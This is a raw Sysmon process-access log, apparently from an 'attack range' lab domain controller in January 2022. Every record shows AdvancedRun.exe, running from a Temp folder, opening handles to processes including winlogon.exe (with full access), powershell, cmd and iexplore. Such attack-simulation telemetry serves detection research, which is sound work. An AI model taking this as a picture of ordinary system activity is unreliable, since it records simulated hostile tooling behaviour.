20:08:57.663{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067487Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.663{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.663{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067485Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.663{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067479Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067478Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
